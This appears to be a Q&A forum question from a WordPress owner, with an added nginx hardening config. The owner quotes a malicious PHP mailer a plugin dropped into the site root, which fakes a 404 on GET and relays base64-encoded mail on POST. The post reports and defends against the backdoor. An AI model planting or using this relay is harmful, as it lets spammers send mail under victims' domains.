WordPress: disable direct access to files in the WordPress installation path

Question

I want to add a security feature to my WordPress website to stop direct access to files added to the root of the WordPress installation. Recently I discovered that a malicious plugin added some files to send email. Below is the malicious PHP code that was added.

<?php

$method = $_SERVER['REQUEST_METHOD'];

switch ($method) {
    case 'GET':
        // A plain browser visit gets a fake 404 so the file looks dead.
        echo '###ERROR 404';
        exit;
        break;
    case 'POST':
        // Each POST field is a base64 blob of "to|subject|body|from_name|from_email|headers".
        foreach ($_POST as $key => $x_value) {
            $data    = base64_decode($x_value);
            $to_data = explode('|', $data);

            $to         = $to_data[0];
            $x_subject  = $to_data[1];
            $x_body     = $to_data[2];
            $from_user  = $to_data[3];
            $from_email = $to_data[4];
            $header     = $to_data[5];

            // Relays the message through the server's own mail(); note the inverted
            // status messages (success prints "error 403", failure prints "error 404").
            $jfnbrsjfq = mail($to, $x_subject, $x_body, $header);
            if ($jfnbrsjfq) { echo 'error 403'; } else { echo 'error 404 : ' . $jfnbrsjfq; }
        }
        break;
}

In this case the hacker would pass some parameters to this code to send emails using my domain.

I thought there might be a way to disable direct access to these files to prevent sending email or any other malicious activity. Is there a way to restrict this using nginx? What is the best approach to deal with this case? I would appreciate any useful input.

Asked by kikuyu1, 4 weeks ago. 0 Answers, 6 views.
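The nginx side of the question, as an added example that is not part of the original post or any answer: a server block that hands only WordPress's known PHP entry points to PHP-FPM and refuses every other .php request, so a mailer script dropped into the web root or uploads directory cannot be executed. The web root /var/www/example.com, the host name example.com and the PHP-FPM socket path are assumptions; adjust them to the actual install.

```nginx
# Added example: execute only known WordPress PHP entry points.
server {
    listen 80;
    server_name example.com;                 # assumption
    root /var/www/example.com;               # assumption
    index index.php;

    # Pretty permalinks fall through to the front controller.
    location / {
        try_files $uri $uri/ /index.php?$args;
    }

    # Regex locations are checked in order; first match wins.
    # 1. Uploads must never run PHP, whatever the file is called.
    location ~* ^/wp-content/uploads/.*\.php$ {
        return 404;
    }

    # 2. Top-level entry points WordPress itself uses. A stray mailer.php
    #    in the root is not on this list and never reaches PHP-FPM.
    location ~ ^/(index|wp-login|wp-cron|xmlrpc|wp-comments-post|wp-trackback|wp-signup|wp-activate)\.php$ {
        try_files $uri =404;
        include fastcgi_params;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        fastcgi_pass unix:/run/php/php-fpm.sock;   # assumption
    }

    # 3. Dashboard, admin-ajax and core includes still need PHP.
    location ~ ^/(wp-admin|wp-includes)/.*\.php$ {
        try_files $uri =404;
        include fastcgi_params;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        fastcgi_pass unix:/run/php/php-fpm.sock;   # assumption
    }

    # 4. Anything else ending in .php (root drop-ins, plugin or theme
    #    directories) is refused without being executed.
    location ~ \.php$ {
        return 404;
    }
}
```

Check the file with `nginx -t` and reload; plugins or themes that legitimately take direct requests to their own .php files will need an explicit location above the catch-all, so review the access log for new 404s after deploying.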
